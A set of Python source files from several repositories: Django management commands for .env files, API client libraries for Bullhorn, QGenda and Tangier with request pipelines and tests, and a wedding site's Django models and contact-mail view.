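`fire.Fire(CloudTasks)` maps the nested classes onto a subcommand tree, so shell invocations follow the attribute path (e.g. `cloud-tasks tasks list --limit 10` or `cloud-tasks clocks start --name nightly`, assuming the console script is installed as `cloud-tasks`). A standalone toy showing the same mapping:
```python
# Toy illustration of fire's class-to-subcommand mapping (not the real CLI).
import fire

class Toy:
    class tasks:
        @staticmethod
        def list(offset=0, limit=100):
            return [f"task-{i}" for i in range(offset, min(limit, offset + 3))]

if __name__ == '__main__':
    fire.Fire(Toy)  # e.g. `python toy.py tasks list --limit 5`
```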
{
"source": "jjorissen52/django-env-settings",
"score": 2
} |
#### File: management/commands/generate_dot_env.py
```python
import os
from django.core.management import BaseCommand
from django.template.loader import render_to_string
from django.conf import settings
class Command(BaseCommand):
@staticmethod
def generate():
params = settings.ENV
allowed_hosts = ','.join(params.ALLOWED_HOSTS) if isinstance(params.ALLOWED_HOSTS, list) else params.ALLOWED_HOSTS
params.ALLOWED_HOSTS = allowed_hosts
dot_env = render_to_string('dot_env_template',
{"parameters": params.__dict__})
with open(os.path.join(settings.BASE_DIR, '.env'), 'w') as f:
f.write(dot_env)
def add_arguments(self, parser):
parser.add_argument('-y', action='store_true')
def handle(self, *args, **options):
if options.get('y', False):
self.generate()
else:
confirm = input("Are you sure you want to generate .env in the project root?"
" This will override any existing version of that file. [y/N] ")
if confirm.lower() in ('y', 'yes'):
self.generate()
else:
print("cancelled.")
```
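A hedged sketch of driving the command non-interactively; `call_command` forwards the `-y` flag so the confirmation prompt is skipped (assumes `DJANGO_SETTINGS_MODULE` is exported and a `dot_env_template` template is on the template path):
```python
# Illustrative, non-interactive invocation of generate_dot_env.
import django

django.setup()  # relies on DJANGO_SETTINGS_MODULE being set

from django.core.management import call_command

call_command('generate_dot_env', '-y')  # writes BASE_DIR/.env without prompting
```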
#### File: management/commands/printenv.py
```python
from django.core.management import BaseCommand
from django.conf import settings
class Command(BaseCommand):
def handle(self, *args, **options):
for key, value in settings.ENV.__dict__.items():
print(f'{key:25} {value}')
``` |
{
"source": "jjorissen52/python-bullhorn",
"score": 2
} |
#### File: bullhorn/pipeline_methods/pre.py
```python
import ast
import time
import logging
from bullhorn.api.exceptions import APICallError
REST_API_PARAMS = "command method entity select_fields start sort count query entity_id_str body where".split(" ")
VALID_COMMANDS = ['search', 'query', 'entity', 'entityFiles']
ENTITY_ID_REQUIRED_METHODS = ['UPDATE', 'DELETE']
VALID_METHODS = ['GET', 'POST'] + ENTITY_ID_REQUIRED_METHODS
def keep_authenticated(params):
"""
"""
request_start = time.time()
self = params.get('self')
auth_details = self.auth_details
expiration_time = auth_details.get("expiration_time", 0) if auth_details else 0
if self.leader and not auth_details:
self.authenticate()
auth_details = self.auth_details
else:
retries = 10
while retries:
if expiration_time - request_start <= 0:
time.sleep(1)
auth_details = self.auth_details
if auth_details:
break
retries -= 1
return params
def clean_api_call_input(params):
problems = []
command, method, entity = params.get('command', None), params.get('method', None), params.get('entity', None)
select_fields, query, body = params.get('select_fields', None), params.get('query', None), params.get('body', '')
entity_id = params.pop('entity_id', None)
entity_id_str = f'/{entity_id}' if entity_id else ''
if method and method.upper() in ENTITY_ID_REQUIRED_METHODS and not entity_id:
problems.append(f"entity_id is a required field for all {ENTITY_ID_REQUIRED_METHODS} methods.")
if command and command.lower() != 'query':
for param in params.keys():
if param not in REST_API_PARAMS and param != 'self':
logging.warning(f'{param} is not an acceptable api parameter. '
f'You may only filter by keyword arguments when using the query command.')
elif command:
if 'where' not in params:
problems.append('where is a required argument for the query command. It cannot be none.')
if command and command.lower() == 'search':
if 'query' not in params:
problems.append("query is a required argument when using the search command.")
    if command and command.lower() == 'entity' and method and method.upper() != 'CREATE' and not entity_id:
problems.append("entity_id is a required argument when attempting to access existing records.")
if not command or not command.lower() in VALID_COMMANDS:
problems.append(f"{command} is not a valid command. Valid commands are {VALID_COMMANDS}")
if not method or not method.upper() in VALID_METHODS:
problems.append(f"{command} is not a valid method. Valid methods are {VALID_METHODS}")
if not entity:
problems.append(f"{entity} is not a valid entity.")
if not select_fields or not isinstance(select_fields, (str, list)):
problems.append(f"{select_fields} is not a valid argument for select_fields. Must be a str or list")
else:
if isinstance(select_fields, list):
select_fields = ','.join(select_fields)
select_fields = select_fields.replace(' ', '')
if problems:
raise APICallError("\n".join(problems))
params.update({"command": command.lower(), "method": method.upper()})
params.update({"entity_id_str": entity_id_str})
params.update({'select_fields': select_fields})
return params
def clean_api_search_input(params):
required_params = "entity query select_fields".split(" ")
if not all(required in params for required in required_params):
raise APICallError("search command requires entity, query, and select_fields are required arguments.")
return params
def translate_kwargs_to_query(params):
mapping = {'gt': '{}>{}', 'gte': '{}>={}', 'lt': '{}<{}', 'lte': '{}<={}', 'to': '{}:[{} TO {}]', 'eq': '{}:{}',
'ne': 'NOT {}:{}'}
supported_comparisons = ['gt', 'gte', 'lt', 'lte', 'to', 'eq', 'ne']
implicit_and = []
for param in params:
if param not in REST_API_PARAMS:
field, comparison = param, 'eq'
if len(param.split('__')) == 2 and param.split('__')[-1] in supported_comparisons:
                field, comparison = param.split('__')[0], param.split('__')[-1]
if comparison not in ['ne', 'to']:
implicit_and.append(mapping[comparison].format(field, params.get(param)))
elif comparison == 'to':
to_list = ast.literal_eval(params.get(param))
if not isinstance(to_list, list):
raise APICallError(f'{param} should be a list of two elements, cannot be {params.get(param)}. '
f'Ex: {param}=[1, 2]')
# implicit_and.append()
raise NotImplementedError('interrupted')
```
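The suffix mapping is the heart of `translate_kwargs_to_query`; since the function above is left unfinished (`NotImplementedError('interrupted')`), here is a standalone sketch of the intended translation for the completed comparisons, with the unfinished `to` range syntax omitted:
```python
# Standalone sketch of the lookup-suffix -> query-string translation.
mapping = {'gt': '{}>{}', 'gte': '{}>={}', 'lt': '{}<{}', 'lte': '{}<={}',
           'eq': '{}:{}', 'ne': 'NOT {}:{}'}

def translate(key, value):
    field, _, suffix = key.partition('__')
    comparison = suffix if suffix in mapping else 'eq'
    field = field if suffix in mapping else key
    return mapping[comparison].format(field, value)

print(translate('dateAdded__gte', 20200101))  # dateAdded>=20200101
print(translate('status', 'Active'))          # status:Active
```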
#### File: python-bullhorn/bullhorn/settings.py
```python
import configparser
import os
import logging
PROJECT_DIR = os.path.dirname(os.path.dirname(__file__))
ENV_CONF_FILE = os.environ.get('BULLHORN_CONF_FILE')
ENV_CONF_REGION = os.environ.get('BULLHORN_CONF_REGION')
DEBUG = bool(os.environ.get('BULLHORN_DEBUG'))
if ENV_CONF_FILE:
CONF_FILE = ENV_CONF_FILE
else:
CONF_FILE = ''
    logging.warning('Please make sure you set the BULLHORN_CONF_FILE '
                    'environment variable. API will not function without it.')
CONF_REGION = ENV_CONF_REGION if ENV_CONF_REGION else 'bullhorn'
DEFAULTS = {
'client_id': None,
'client_secret': None,
'username': None,
'password': <PASSWORD>,
'login_url': 'https://auth.bullhornstaffing.com/oauth/authorize',
'grant_url': 'https://auth.bullhornstaffing.com/oauth/token',
'rest_login_url': 'https://rest.bullhornstaffing.com/rest-services/login',
'api_version': '*',
'cache_backend': None,
'cache_host': None,
'cache_port': None,
'cache_lifetime': 0,
'debug': DEBUG,
}
def read_config(keys):
"""
We don't want a failed import for bad config, we just want to set everything that is not in the config file/region
set to None
:param keys: (iterable) default keys to set to None
:return:
"""
config = configparser.ConfigParser(defaults=DEFAULTS)
config.read(CONF_FILE)
if not config.has_section(CONF_REGION):
config.add_section(CONF_REGION)
parameters = {key: config.get(CONF_REGION, key) for key in keys}
parameters.update({'config': config})
return parameters
config_dict = read_config(DEFAULTS.keys())
CLIENT_ID = config_dict.get('client_id')
CLIENT_SECRET = config_dict.get('client_secret')
USERNAME = config_dict.get('username')
PASSWORD = <PASSWORD>_<PASSWORD>('password')
LOGIN_URL = config_dict.get('login_url')
GRANT_URL = config_dict.get('grant_url')
REST_LOGIN_URL = config_dict.get('rest_login_url')
API_VERSION = config_dict.get('api_version')
CACHE_BACKEND = config_dict.get('cache_backend')
USE_CACHING = bool(CACHE_BACKEND)
CACHE_HOST = config_dict.get('cache_host')
CACHE_PORT = config_dict.get('cache_port')
CACHE_LIFETIME = int(config_dict.get('cache_lifetime') if config_dict.get('cache_lifetime') else 0)
DEBUG = config_dict.get('debug')
``` |
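Every value falls back to `DEFAULTS`, so a config file only needs the keys it overrides. A hypothetical file for the default `bullhorn` region (all values are placeholders) and how configparser reads it back:
```python
# Hypothetical config contents; every value shown here is a placeholder.
import configparser

sample = """
[bullhorn]
client_id = my-client-id
client_secret = my-client-secret
username = api.user
cache_backend = memcached
cache_host = 127.0.0.1
cache_port = 11211
cache_lifetime = 300
"""

config = configparser.ConfigParser()
config.read_string(sample)
print(config.get('bullhorn', 'client_id'))       # my-client-id
print(config.get('bullhorn', 'cache_lifetime'))  # 300 (strings until cast)
```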
{
"source": "jjorissen52/python-qgenda",
"score": 2
} |
#### File: qgenda/pipeline/pipelines.py
```python
import functools
import sys
from qgenda import helpers
from qgenda.cache import cache
from qgenda.settings import CACHE_LIFETIME
class pre_execution_pipeline:
def __init__(self, *pipline_functions):
self.pipeline_functions = pipline_functions
for pipeline in self.pipeline_functions:
module = str(sys.modules[pipeline.__module__])
assert 'pipeline.pre' in module, f'{pipeline.__name__} must be in qgenda_api.pipeline.pre'
def __call__(self, method):
@functools.wraps(method)
def decorated(client_obj, *args, **kwargs):
params = helpers.named_method_params(method, args, kwargs)
request_key = f'{method.__name__}:{args}:{kwargs}'.replace(' ', '_') # memcached does not allow spaces
setattr(client_obj, 'latest_request_key', request_key)
cached_response = cache.get(request_key) if client_obj.use_caching else None
if cached_response:
return cached_response
caller_name = method.__name__
            # need to save caller so the post_execution pipeline can get access.
if not getattr(self, 'caller', None):
setattr(self, 'caller', method)
for pipline_func in self.pipeline_functions:
client_obj, caller_name, params = pipline_func(client_obj, caller_name, params)
# storing execution params and cache key on client for use by post_execution_pipeline
setattr(client_obj, 'latest_execution_params', {**params})
return method(client_obj, **params)
return decorated
class post_execution_pipeline:
"""
object pass in __call__ will either be a method or a pre-execution pipeline.
"""
def __init__(self, *pipline_functions):
self.pipeline_functions = pipline_functions
for pipeline in self.pipeline_functions:
module = str(sys.modules[pipeline.__module__])
assert 'pipeline.post' in module, f'{pipeline.__name__} must be in qgenda_api.pipeline.post'
def __call__(self, method):
@functools.wraps(method)
def decorated(client_self, *args, **kwargs):
request_key = client_self.latest_request_key
execution_params = getattr(client_self, 'latest_execution_params', None)
response = method(client_self, *args, **kwargs)
if not execution_params:
return response
for pipline_func in self.pipeline_functions:
client_self, response = pipline_func(client_self, response)
if client_self.use_caching:
cache.set(request_key, response, CACHE_LIFETIME)
return response
return decorated
```
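A structural sketch of how the two pipelines stack on a client method: post outermost, so it sees the response returned by the pre-wrapped call. The pipeline functions must come from `qgenda.pipeline.pre`/`.post` to satisfy the module asserts above; the client internals are elided, so this defines but does not exercise the method:
```python
# Hedged wiring sketch; attribute values are stand-ins for real client state.
import logging
from qgenda.pipeline.pipelines import pre_execution_pipeline, post_execution_pipeline
from qgenda.pipeline import pre, post

logger = logging.getLogger(__name__)

class SketchClient:
    use_caching = False
    gzip_safe = ()
    headers = {'Accept-Encoding': 'gzip'}

    @post_execution_pipeline(post.handle_error_response(logger))
    @pre_execution_pipeline(pre.gzip_headers)
    def get_staff(self, headers=None):
        """Would issue the HTTP request; body elided in this sketch."""
```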
#### File: qgenda/pipeline/post.py
```python
import json
import time
from qgenda.api.exceptions import HTTPError, APICallError
def handle_error_response(logger):
def real_decorator(client_obj, response):
"""
Raises HTTPError if there is an HTTP error and raise_errors=True, otherwise just adds error information to
response.text
"""
raise_errors = client_obj.raise_errors
if response.status_code >= 400:
logger.error(f'API Call returned HTTP error response {response.status_code}: {response.reason}')
if raise_errors:
raise HTTPError(f'API Call returned HTTP error response {response.status_code}: {response.reason}')
else:
setattr(response, 'text', {
"error": response.status_code,
"error_description": response.reason,
})
else:
response_dict = json.loads(response.text)
if any(["error" in key for key in response_dict]) and raise_errors:
raise APICallError(f'Error Response: {json.dumps(response_dict, indent=2)}')
return client_obj, response
return real_decorator
def handle_login_response(client_obj, response):
"""
For now just sets auth_details on the caller, but will eventually handle caching
"""
request_start = time.time()
response_dict = json.loads(response.text)
if "expires_in" in response_dict:
expiration_time = request_start + int(response_dict["expires_in"]) - 30 # 30 second buffer here to be safe
response_dict.update({"expiration_time": expiration_time})
client_obj.auth_details = response_dict
return client_obj, response
```
#### File: qgenda/pipeline/pre.py
```python
import time
from qgenda import helpers
def gzip_headers(method_self, caller=None, params=None):
if caller not in method_self.gzip_safe:
use_gzip = params.pop('gzip', False)
params['headers'] = method_self.headers if use_gzip else {
key: value for key, value in method_self.headers.items() if value != 'gzip'
}
return method_self, caller, params
def keep_authenticated(method_self, caller=None, params=None):
"""
"""
request_start = time.time()
auth_details = method_self.auth_details
expiration_time = auth_details.get("expiration_time", 0) if auth_details else 0
if method_self.leader and not auth_details:
method_self.authenticate()
auth_details = method_self.auth_details
else:
retries = 10
while retries:
if expiration_time - request_start <= 0:
time.sleep(1)
auth_details = method_self.auth_details
if auth_details:
break
retries -= 1
if "access_token" in auth_details:
method_self.headers.update({"Authorization": f'bearer {auth_details["access_token"]}'})
params['headers'].update({"Authorization": f'bearer {auth_details["access_token"]}'})
return method_self, caller, params
def prepare_odata(logger):
odata_filters = ['$filter', '$select', '$orderby']
def real_decorator(method_self, caller, params):
odata_kwargs = params.get('odata_kwargs', {})
extra = []
if odata_kwargs:
extra = [key for key in odata_kwargs.keys() if key not in odata_filters]
if extra:
for e in extra:
odata_kwargs.pop(e)
logger.warning(f'Extra OData filter(s) removed from kwargs. Invalid filter {extra}')
params['odata_kwargs'] = odata_kwargs
return method_self, caller, params
return real_decorator
```
#### File: qgenda/tests/test_exceptions.py
```python
import unittest
import os
os.environ['QGENDA_CONF_REGION'] = 'qgenda_test' # ensure bad imports
from qgenda.api.client import QGendaClient
from qgenda.api import exceptions
"""
NOTE: RUNNING THIS TEST WILL RUIN YOUR IMPORTS! YOU WILL NEED TO RUN THIS TEST SEPARATELY FROM THE OTHERS!
"""
class TestRaises(unittest.TestCase):
def test_improper_config(self):
with self.assertRaises(exceptions.ImproperlyConfigured):
QGendaClient(None, 'password', company_key=None, raise_errors=True)
def test_bad_login(self):
with self.assertRaises(exceptions.APICallError):
client = QGendaClient('username', 'password', 'company_key', api_version='v2',
api_url='https://api.qgenda.com/', raise_errors=True)
client.authenticate()
class TestNoRaise(unittest.TestCase):
def test_bad_login(self):
client = QGendaClient('username', 'password', 'company_key', api_version='v2',
api_url='https://api.qgenda.com/', raise_errors=False)
client.authenticate()
self.assertTrue(all(key in client.auth_details for key in ["error", "error_description"]))
if __name__ == '__main__':
unittest.main()
```
#### File: qgenda/tests/test_shared_auth.py
```python
import datetime
import json
import time
import unittest
import logging
from qgenda.api.client import QGendaClient
from qgenda.api import exceptions
logger = logging.getLogger(__name__)
class TestSharedAuth(unittest.TestCase):
"""
Testing the leader/follower implementation.
"""
def test_bad_config(self):
with self.assertRaises(exceptions.ImproperlyConfigured):
client = QGendaClient(raise_errors=True, use_caching=False, leader=False)
def test_shared_auth_basic(self):
client1 = QGendaClient(raise_errors=True, leader=True)
if not client1.use_caching:
logger.warning('Caching is disabled and shared auth will not be used.')
return
client2 = QGendaClient(raise_errors=True, leader=False)
response1 = client1.get_staff()
response2 = client2.get_staff()
        self.assertEqual(response1.status_code, 200)
        self.assertEqual(response2.status_code, 200)
def test_shared_auth_excessive(self):
leader = QGendaClient(raise_errors=True, leader=True)
if not leader.use_caching:
logger.warning('Caching is disabled and shared auth will not be used.')
return
response = leader.get_staff()
        self.assertEqual(response.status_code, 200)
start = time.time()
for i in range(100):
client = QGendaClient(raise_errors=True, leader=False)
response = client.get_staff()
            self.assertEqual(response.status_code, 200)
latest = time.time()
self.assertTrue(latest - start < 3, 'Caching test is taking too long. '
'Caching is slow or improperly configured.')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jjorissen52/react-wedding",
"score": 2
} |
#### File: wedding_api/content/models.py
```python
from django.db import models
class Page(models.Model):
slug = models.CharField(max_length=50, unique=True)
contents = models.ManyToManyField('content.Content')
order = models.IntegerField(default=0, help_text='lower number is higher priority.')
class Meta:
ordering = ('order', )
def __str__(self):
return str(self.slug)
class Content(models.Model):
header = models.TextField(blank=True, null=True)
description = models.TextField(blank=True, null=True)
background = models.FileField(blank=True, null=True, upload_to='uploaded_backgrounds')
order = models.IntegerField(default=0, help_text='lower number is higher priority.')
class Meta:
ordering = ('order', )
def __str__(self):
return str(self.header)
class Image(models.Model):
title = models.CharField(max_length=50)
file = models.FileField(blank=True, null=True, upload_to='uploaded_images')
def __str__(self):
return str(self.title)
```
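A small hedged sketch of how a view might resolve a page with its ordered blocks (assuming the app is importable as `content`); both querysets come back ordered via each model's `Meta.ordering`:
```python
# Illustrative lookup of a page and its ordered content blocks.
from content.models import Page

def page_payload(slug):
    page = Page.objects.get(slug=slug)
    return [{'header': c.header, 'description': c.description}
            for c in page.contents.all()]  # ordered by Content.Meta.ordering
```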
#### File: wedding_api/mailjet/views.py
```python
import json
import os, configparser
import requests
from django.core.mail import send_mail
from rest_framework.permissions import AllowAny
from rest_framework.viewsets import GenericViewSet
from rest_framework.generics import CreateAPIView
from rest_framework.response import Response
from . import serializers
from django.conf import settings
config = configparser.ConfigParser()
config.read(os.path.join(settings.BASE_DIR, 'secrets.ini'))
SENDER_EMAIL = config.get('mailjet', 'SENDER_EMAIL')
RECIPIENT_EMAIL = config.get('mailjet', 'RECIPIENT_EMAIL')
MJ_APIKEY_PUBLIC = config.get('mailjet', 'MJ_APIKEY_PUBLIC')
MJ_APIKEY_PRIVATE = config.get('mailjet', 'MJ_APIKEY_PRIVATE')
class SendViaMailJet(CreateAPIView, GenericViewSet):
serializer_class = serializers.MailJetSerializer
permission_classes = [AllowAny]
def create(self, request, *args, **kwargs):
serializer = SendViaMailJet.serializer_class(data=request.data)
if not serializer.is_valid():
return Response({
"errors": "Your email could not be sent. Please ensure that you've filled out all fields completely."
})
        if getattr(request, "_total_emails_sent", 0) >= settings.TOTAL_EMAILS_ALLOWED:
return Response({
"errors": "Your email could not processed at this time. We are recieving an unusally large amount of "
"email requests and must investigate."
})
error_message = ""
try:
notification_text = serializer.data["message"]
send_mail(f"Wedding Contact Request - {serializer.data['name']}",
notification_text,
settings.DEFAULT_FROM_EMAIL,
[serializer.data['email']], html_message=f"<html>{notification_text}</html>", fail_silently=False)
except Exception:
error_message += "Something went wrong, and JP and Sarah will not be receiving this email."
try:
            receipt_text = f'You sent the following message to JP and Sarah: {serializer.data["message"]}'
            send_mail("Wedding Contact Request - Message Receipt",
                      receipt_text,
                      settings.DEFAULT_FROM_EMAIL,
                      [serializer.data['email']], html_message=f"<html>{receipt_text}</html>", fail_silently=False)
except Exception:
if not error_message:
error_message += "Your email was sent, but something went wrong and you will not be receiving a " \
"send receipt via email."
if error_message:
return Response({
"errors": error_message
})
else:
return Response({"results": "Thanks for reaching out! You should receive a message receipt soon."})
``` |
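Since the viewset only implements `create`, it would be exposed through a DRF router roughly as follows; the URL prefix and basename are assumptions, not taken from the repository:
```python
# Hypothetical URL wiring for SendViaMailJet.
from rest_framework import routers
from mailjet.views import SendViaMailJet

router = routers.DefaultRouter()
router.register(r'contact', SendViaMailJet, basename='contact')

urlpatterns = router.urls  # POST /contact/ -> SendViaMailJet.create
```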
{
"source": "jjorissen52/tangier_api",
"score": 2
} |
#### File: tangier_api/api/location.py
```python
import zeep
import requests
import xmlmanip
from tangier_api import settings
from tangier_api import exceptions
from tangier_api import wrappers
class LocationConnection:
def __init__(self, xml_string="", endpoint=settings.LOCATION_ENDPOINT, show_xml_request=False, show_xml_response=False):
"""
:param xml_string: override the default xml, which is just <tangier method="schedule.request"/>
:param endpoint: where the WSDL info is with routing info and SOAP API definitions
"""
        super().__init__()
if not xml_string:
self.base_xml = """<tangier version="1.0" method="location.request"></tangier>"""
else:
self.base_xml = xml_string
# these two are used with @debug_options
self.show_xml_request = show_xml_request
self.show_xml_response = show_xml_response
self.base_xml = xmlmanip.inject_tags(self.base_xml, admin_user=settings.TANGIER_USERNAME, admin_pwd=settings.TANGIER_PASSWORD)
self.client = zeep.Client(endpoint, transport=zeep.transports.Transport(session=requests.Session()))
@wrappers.handle_response
@wrappers.debug_options
def MaintainLocations(self, xml_string):
"""
WSDL GetLocation method
:param xml_string: (xml str) fully formed xml string for GetLocation request
:return:
"""
return self.client.service.MaintainLocations(xml_string)
def get_locations_info(self, site_ids=None, xml_string=None):
"""
:param xml_string: (xml string) overrides the default credential and/or location injection into base_xml
:return: xml response string with an error message or info about a location.
"""
# sites = {"site_id": site_id for i, site_id in enumerate(site_ids)}
if not site_ids:
site_ids = 'ALL_SITE_IDS'
if not issubclass(site_ids.__class__, list):
site_ids = [site_ids]
tags = {f"location__{i}": {"action": "info", "__inner_tag": {"site_id": site_id}} for i, site_id in
enumerate(site_ids)}
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, locations="")
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="locations", **tags)
return self.MaintainLocations(xml_string).encode('utf-8')
def location_info_values_list(self, site_ids=None):
"""
Returns a Searchable List object (subclass of list) of all locations returned by get_locations_info
:param provider_ids: (list) of all emp_ids corresponding to desired locations info
:return: (SearchableList) of all locations returned by get_locations_info
"""
xml_string = self.get_locations_info(site_ids)
schema = xmlmanip.XMLSchema(xml_string)
# kind of hacky way to get every element with a site_id tag
location_list = schema.search(site_id__contains='')
return location_list
def add_location(self, site_id=None, xml_string=None, name=None, short_name=None, **kwargs):
"""
:param site_id: (str) id of site to be added
:param xml_string: (xml string) overrides the default credential and/or location injection into base_xml
:param kwargs: additional named properties to be provided in the creation request.
:return: xml response string with an error message or info about a location.
"""
if not (site_id and name and short_name):
            raise exceptions.APICallError('site_id, name, and short_name are all required keyword arguments.')
tags = {f"location": {"action": "add", "__inner_tag": {"site_id": site_id,
"name": name, 'short_name': short_name, **kwargs}}}
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, locations="")
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="locations", **tags)
return self.MaintainLocations(xml_string).encode('utf-8')
def update_location(self, site_id=None, new_site_id=None, xml_string=None, name=None, short_name=None, **kwargs):
"""
:param site_id: (str) id of site to be added
:param new_site_id: (str) id of site to be renamed, if desired
:param xml_string: (xml string) overrides the default credential and/or location injection into base_xml
:param kwargs: additional named properties to be provided in the creation request.
:return: xml response string with an error message or info about a location.
"""
if not (site_id and name and short_name):
            raise exceptions.APICallError('site_id, name, and short_name are all required keyword arguments.')
if new_site_id:
tags = {f"location": {"action": "update",
"__inner_tag": {"site_id": site_id, 'new_site_id': new_site_id,
"name": name, 'short_name': short_name, **kwargs}}}
else:
tags = {f"location": {"action": "update", "__inner_tag": {"site_id": site_id, "name": name,
'short_name': short_name, **kwargs}}}
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, locations="")
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="locations", **tags)
return self.MaintainLocations(xml_string).encode('utf-8')
def delete_location(self, site_id=None, xml_string=None):
"""
:param site_id: (str) id of site to be deleted
:param xml_string: (xml string) overrides the default credential and/or location injection into base_xml
:return: xml response string with an error message or info about a location.
"""
if not site_id:
raise exceptions.APICallError(f'site_id cannot be {site_id}')
tags = {f"location": {"action": "delete", "__inner_tag": {"site_id": site_id}}}
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, locations="")
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="locations", **tags)
return self.MaintainLocations(xml_string).encode('utf-8')
```
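A hedged usage sketch: credentials are injected from `tangier_api.settings`, so a session only needs the site ids it cares about (the ids below are placeholders). Raw responses are XML bytes; `location_info_values_list` is the parsed convenience layer:
```python
# Illustrative location queries; site ids are placeholders.
from tangier_api.api import LocationConnection

lconn = LocationConnection(show_xml_request=True)
raw_xml = lconn.get_locations_info(site_ids=['1001', '1002'])  # bytes
all_sites = lconn.location_info_values_list()  # SearchableList of dicts
print([site.get('site_id') for site in all_sites])
```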
#### File: tangier_api/api/provider.py
```python
import zeep
import requests
import xmlmanip
from tangier_api import settings
from tangier_api import exceptions
class ProviderConnection:
def __init__(self, xml_string="", endpoint=settings.PROVIDER_ENDPOINT):
"""
Injects credentials into <tanger/> root schema and
:param xml_string: override the base xml, which is just <tangier method="schedule.request"/>
:param endpoint: where the WSDL info is with routing info and SOAP API definitions
"""
if not xml_string:
self.base_xml = """<tangier version="1.0" method="provider.request"></tangier>"""
else:
self.base_xml = xml_string
self.base_xml = xmlmanip.inject_tags(self.base_xml, admin_user=settings.TANGIER_USERNAME,
admin_pwd=<PASSWORD>)
self.client = zeep.Client(endpoint, transport=zeep.transports.Transport(session=requests.Session()))
def MaintainProviders(self, xml_string=""):
return self.client.service.MaintainProviders(xml_string)
def get_provider_info(self, provider_ids=None, use_primary_keys=True, all_providers=True, xml_string="", **tags):
"""
Method to retrieve info on all providers corresponding to the list "provider_ids"
:param provider_ids: (list) of all emp_ids corresponding to desired provider info
:param use_primary_keys: (bool) indicates whether provider_ids should be treated as emp_id or provider_primary_key
:param all_providers: (bool) indicates whether to return data on all existing providers
:param xml_string: (xml string) overrides default xml string provided by the instantiation of the class object
:param tags: (kwargs) things to be injected into the request. ex: start_date="2017-05-01", end_date="2017-05-02"
:return:
"""
if not provider_ids and not all_providers:
raise exceptions.APICallError("You must provide either a list of provider_ids or set all_providers=True.")
elif not isinstance(provider_ids, list):
provider_ids = [provider_ids]
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, providers="")
provider_dict = {}
id_label = "provider_primary_key" if use_primary_keys else "emp_id"
if not all_providers:
for i, provider_id in enumerate(provider_ids):
provider_dict[f'provider__{i}'] = {"action": "info", "__inner_tag": {id_label: f"{provider_id}"}}
else:
provider_dict[f'provider'] = {"action": "info", "__inner_tag": {id_label: "ALL"}}
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="providers", **provider_dict)
# return xml_string
return self.MaintainProviders(xml_string).encode('utf-8')
def provider_info_values_list(self, use_primary_keys=True, **kwargs):
"""
Wrapper for get_provider info which converts the xml response into a list of dicts
"""
        xml_string = self.get_provider_info(use_primary_keys=use_primary_keys, **kwargs)
schema = xmlmanip.XMLSchema(xml_string)
if kwargs.get('all_providers'):
id_label = 'provider_primary_key'
else:
id_label = "provider_primary_key" if use_primary_keys else "emp_id"
# using contains method here is kind of hacky way to get every element with an {id_label} tag, basically I'm
# just checking to see that the label even exists
label_dict = {f"{id_label}__contains": ""}
provider_list = schema.search(**label_dict)
return provider_list
```
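The provider side mirrors the location connection; `provider_info_values_list` flattens the XML into dicts keyed by `provider_primary_key` or `emp_id` depending on `use_primary_keys` (the ids below are placeholders):
```python
# Illustrative provider queries; emp ids are placeholders.
from tangier_api.api import ProviderConnection

pconn = ProviderConnection()
everyone = pconn.provider_info_values_list(all_providers=True)
by_npi = pconn.provider_info_values_list(provider_ids=['1234567890'],
                                         use_primary_keys=False,
                                         all_providers=False)
```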
#### File: tangier_api/api/specialty.py
```python
import sys
import pandas
import re
import xmlmanip
from tangier_api.api import ScheduleConnection
from tangier_api.api import ProviderConnection
from tangier_api.api import LocationConnection
from tangier_api import helpers
from tangier_api import exceptions
class ScheduleManipulation(ScheduleConnection):
def save_schedule_from_range(self, start_date=None, end_date=None, site_ids=None, xml_string="", **tags):
"""
Saves schedule for indicated date range and facilities to ScheduleConnection object
:param start_date: (str) %Y-%m-%d date string indicating the beginning of the range from which to pull the schedule
:param end_date: (str) %Y-%m-%d date string indicating the ending of the range from which to pull the schedule
:param site_ids: (list or None) list of ids corresponding to the site(s) that the schedule will be pulled from, defaults to the list pulled from site_file in the __init__ function
:param xml_string: (xml string) overrides the default credential and/or schedule injection into base_xml
:param tags: (kwargs) things to be injected into the request.
:return:
"""
schedule_values_list = []
ranges = helpers.date_ranges(start_date, end_date)
for date_range in ranges:
print(str(date_range))
schedule_values_list.extend(
self.get_schedule_values_list(date_range[0], date_range[1], site_ids, xml_string, **tags))
df = pandas.DataFrame(schedule_values_list)
if df.empty:
raise exceptions.APICallError('No schedule was returned in the given range.')
df = df.sort_values(['shift_start_date', 'shift_end_date']).reset_index()
df = df.drop(['index'], axis=1)
self.saved_schedule = df.copy()
def get_schedule_open(self, info=False):
"""
Gets DataFrame of all entries from schedule where providername == "open" in the saved_schedule
:param info: (bool) whether or not to print out progress
        :return: (DataFrame) of all open entries from the schedule (providername == "open")
"""
if self.saved_schedule is None:
raise exceptions.APICallError('There must be a saved schedule from save_schedule_from_range.')
df = self.saved_schedule.copy()
open_df = df[df['providername'] == 'open']
return open_df
def get_schedule_empties(self, info=False):
"""
Gets DataFrame of all entries from schedule which were not worked (reportedminutes == 0) in the saved_schedule
:param info: (bool) whether or not to print out progress
:return: (DataFrame) of all entries from schedule which were not worked (reportedminutes == 0)
"""
if self.saved_schedule is None:
raise exceptions.APICallError('There must be a saved schedule from save_schedule_from_range.')
df = self.saved_schedule.copy()
empties = df[df['reportedminutes'] == '0']
return empties
def get_schedule_conflicts(self, info=False):
"""
Gets DataFrame of all entries where an employee worked a double-booked shift in the saved_schedule
:param info: (bool) whether or not to print out progress
:return: (DataFrame) of all entries where an employee worked a double-booked shift
"""
if self.saved_schedule is None:
raise exceptions.APICallError('There must be a saved schedule from save_schedule_from_range.')
df = self.saved_schedule.copy()
if not 'provider_primary_key' in df.columns:
raise exceptions.APICallError('get_schedule_conflicts, and get_schedule_duplicates '
'rely on use of provider_primary_key=True.')
